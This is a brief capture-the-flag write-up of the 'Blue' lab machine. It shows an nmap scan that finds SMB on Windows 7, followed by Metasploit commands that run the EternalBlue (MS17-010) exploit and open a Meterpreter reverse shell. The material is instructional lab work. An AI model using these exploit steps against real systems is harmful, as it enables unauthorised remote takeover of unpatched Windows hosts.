Blue


Contents

Intro


Very quick box, the name of it gives a significant hint as to what you're supposed to do here...

User and Root


Running nmap:

sudo nmap -sC -sV 10.129.24.215

135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

The machine is running Windows 7, which has been long outdated, which is a good indicator it might be vulnerable to EternalBlue. We can use msfconsole to test that theory:

[msf](Jobs:0 Agents:0) >> use exploit/windows/smb/ms17_010_eternalblue

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RHOSTS 10.129.24.215
RHOSTS => 10.129.24.215

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set LHOST tun0
LHOST => *.*.*.*

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run

(Meterpreter 1)(C:\Windows\system32) >

We get a meterpreter on the machine, and we get both flags at the same time!